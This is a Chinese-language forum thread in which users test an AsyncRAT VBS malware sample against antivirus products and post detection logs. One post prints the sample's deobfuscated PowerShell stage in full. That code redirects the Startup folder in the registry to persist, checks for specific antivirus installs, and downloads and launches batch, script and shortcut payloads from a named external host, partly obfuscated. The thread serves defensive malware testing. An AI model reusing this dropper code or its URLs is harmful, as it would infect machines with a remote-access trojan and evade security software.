#AsyncRAT #VBS

显示全部楼层 · 发表于 2021-5-2 13:46:54

本帖最后由 hsks 于 2021-5-2 13:52 编辑

双击估计都能杀
https://www.virustotal.com/gui/f ... 836a67a61/detection

172.96.186.134

显示全部楼层 · 发表于 2021-5-2 13:51:37

Panda Dome
双击杀

显示全部楼层 · 发表于 2021-5-2 13:51:38

eis miss

显示全部楼层 · 发表于 2021-5-2 14:00:16

Norton杀

这报毒名看不懂

难道是脚本控制？

但是日志说是启发

文件名: CL.Downloader!gen10
完整路径: 不可用

____________________________

____________________________

在电脑上
不可用

上次使用时间
2021/5/2 ( 13:59:41 )

启动项
否

已启动
否

威胁类型: 启发式病毒。根据恶意软件启发式技术检测威胁。

____________________________

CL.Downloader!gen10
定位

未知
Norton 社区中使用了此文件的用户数未知。

未知
此文件版本当前未知。

高
此文件具有高风险。

____________________________

来源: 外部介质

____________________________

文件操作

文件: powershell.exe (CL.Downloader!gen10) 未尝试修复
____________________________

文件指纹 - SHA:
不可用
文件指纹 - MD5:
不可用

显示全部楼层 · 发表于 2021-5-2 14:00:47

双击后云端启发杀
事件: 检测到恶意对象
用户类型: 活动用户
应用程序名称: wscript.exe
应用程序路径: C:\Windows\System32
组件: 文件反病毒
结果说明: 检测到
类型: 木马
名称: VHO:Trojan.VBS.SAgent.gen
精确度: 启发式分析
威胁级别: 高
对象类型: 文件
对象名称: a75682a8be7a7470d0afbcb52b78fd4062fd4a719179730fe3ae6ce836a67a61.vbs
对象路径: C:\Users\ling\Desktop\a75682a8be7a7470d0afbcb52b78fd4062fd4a719179730fe3ae6ce836a67a61
MD5: BCBAD24347E93A0508784F3B4301B7EB
原因: 云保护

显示全部楼层 · 发表于 2021-5-2 14:10:11

智量双击kill

显示全部楼层 · 发表于 2021-5-2 15:32:50

拦了个连接，顺便还把PowerShell给放进隔离区了，病毒本体也不见了
此次发现新的报毒法

显示全部楼层 · 发表于 2021-5-2 16:45:28

fs kill Trojan:W32/Generic.e53eebe440!Online

显示全部楼层 · 发表于 2021-5-2 17:25:57

[system.io.directory]::CreateDirectory("C:\P"+"r"+"o"+"g"+"ra"+"mDa"+"t"+"a\Micr"+"oso"+"f"+"t A"+"rts"+"\S"+"ta"+"rt")
start-sleep -s 5
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" -Name "Startup" -Value "C:\ProgramData\Microsoft Arts\Start";
start-sleep -s 5
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" -Name "Startup" -Value "C:\ProgramData\Microsoft Arts\Start";
Function aloshy
{
if([System.IO.File]::Exists("C:\Program Files\Avast Software\Avast\AvastUI.exe")){
start-sleep -s 10
powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://nyc002.hawkhost.com/~mazenne1/ExDef/GoogleUpdate.bat', 'C:\Users\Public\GoogleUpdate.bat') }"
powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://nyc002.hawkhost.com/~mazenne1/ITR/1.txt', 'C:\Users\Public\msi.ps1') }"
powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://nyc002.hawkhost.com/~mazenne1/ExDef/Dicord.lnk', 'C:\ProgramData\Microsoft Arts\Start\Dicord.lnk') }"
start-sleep -s 7
Start "C:\ProgramData\Microsoft Arts\Start\Dicord.lnk"
start-sleep -s 3
Start "C:\ProgramData\Microsoft Arts\Start\Dicord.lnk"
}
elseif([System.IO.File]::Exists("C:\Program Files\ESET\ESET Security\ecmds.exe")){
powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://nyc002.hawkhost.com/~mazenne1/ExDef/GoogleUpdate.bat', 'C:\Users\Public\GoogleUpdate.bat') }"
powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://nyc002.hawkhost.com/~mazenne1/ITR/2.txt', 'C:\Users\Public\msi.ps1') }"
powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://nyc002.hawkhost.com/~mazenne1/ExDef/Dicord.lnk', 'C:\ProgramData\Microsoft Arts\Start\Dicord.lnk') }"
start-sleep -s 7
Start "C:\ProgramData\Microsoft Arts\Start\Dicord.lnk"
start-sleep -s 3
Start "C:\ProgramData\Microsoft Arts\Start\Dicord.lnk"
}
elseif([System.IO.File]::Exists("C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe")){
powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://nyc002.hawkhost.com/~mazenne1/ExDef/GoogleUpdate.bat', 'C:\Users\Public\GoogleUpdate.bat') }"
powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://nyc002.hawkhost.com/~mazenne1/ITR/1.txt', 'C:\Users\Public\msi.ps1') }"
powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://nyc002.hawkhost.com/~mazenne1/ExDef/Dicord.lnk', 'C:\ProgramData\Microsoft Arts\Start\Dicord.lnk') }"
start-sleep -s 7
Start "C:\ProgramData\Microsoft Arts\Start\Dicord.lnk"
start-sleep -s 3
Start "C:\ProgramData\Microsoft Arts\Start\Dicord.lnk"
}
elseif([System.IO.File]::Exists("C:\Program Files\AVG\Antivirus\AVGUI.exe")){
powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://nyc002.hawkhost.com/~mazenne1/ExDef/GoogleUpdate.bat', 'C:\Users\Public\GoogleUpdate.bat') }"
powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://nyc002.hawkhost.com/~mazenne1/ITR/1.txt', 'C:\Users\Public\msi.ps1') }"
powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://nyc002.hawkhost.com/~mazenne1/ExDef/Dicord.lnk', 'C:\ProgramData\Microsoft Arts\Start\Dicord.lnk') }"
start-sleep -s 7
Start "C:\ProgramData\Microsoft Arts\Start\Dicord.lnk"
start-sleep -s 3
Start "C:\ProgramData\Microsoft Arts\Start\Dicord.lnk"
}
else{
$defender = 'C^^^^^^^^^^^^^^^^^^blic\'.Replace("^^^^^^^^^^^^^^^^^^",":\Users\Pu")
if((New-Object "`N`e`T`.`W`e`B`C`l`i`e`N`T")."`D`o`w`N`l`o`A`d`F`i`l`e"('https://nyc002.hawkhost.com/~mazenne1/NDef/all.bat', $defender + '11.ps1')){
}
$def = 'C^^^^^^^^^^^^^^^^^^blic\'.Replace("^^^^^^^^^^^^^^^^^^",":\Users\Pu")
if((New-Object "`N`e`T`.`W`e`B`C`l`i`e`N`T")."`D`o`w`N`l`o`A`d`F`i`l`e"('https://nyc002.hawkhost.com/~mazenne1/ExDef/ss.vbs', $def + 'ss.vbs')){
}
start-sleep -s 25
start "C:\Users\Public\ss.vbs"
start-sleep -s 20
powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://nyc002.hawkhost.com/~mazenne1/ExDef/GoogleUpdate.bat', 'C:\Users\Public\GoogleUpdate.bat') }"
powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://nyc002.hawkhost.com/~mazenne1/ITR/1.txt', 'C:\Users\Public\msi.ps1') }"
powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://nyc002.hawkhost.com/~mazenne1/ExDef/Dicord.lnk', 'C:\ProgramData\Microsoft Arts\Start\Dicord.lnk') }"
start-sleep -s 7
Start "C:\ProgramData\Microsoft Arts\Start\Dicord.lnk"
start-sleep -s 3
Start "C:\ProgramData\Microsoft Arts\Start\Dicord.lnk"
}
}
IEX aloshy

复制代码

显示全部楼层 · 发表于 2021-5-2 18:14:31

G DATA INTERNET SECURITY has prevented malicious software from running on your system.
The malicious program was identified by BEAST (Behavior Monitoring) as: Generic.926D1CBF
The following processes were therefore terminated by G DATA for security reasons:
----------------------------------------------------------------
C:\Program Files\WinRAR\WinRAR.exe (PID 3868)
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (PID 1228)
----------------------------------------------------------------
The following programs responsible were moved to Quarantine by G DATA:
----------------------------------------------------------------
C:\Users\promi\AppData\Local\Temp\Rar$DIb3868.17467\a75682a8be7a7470d0afbcb52b78fd4062fd4a719179730fe3ae6ce836a67a61.vbs
C:\Users\promi\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
C:\Users\promi\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
----------------------------------------------------------------
Further information:
Ref: c32113fd-664d-475d-94de-e0ad74a6ea20

复制代码

[病毒样本] #AsyncRAT #VBS

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源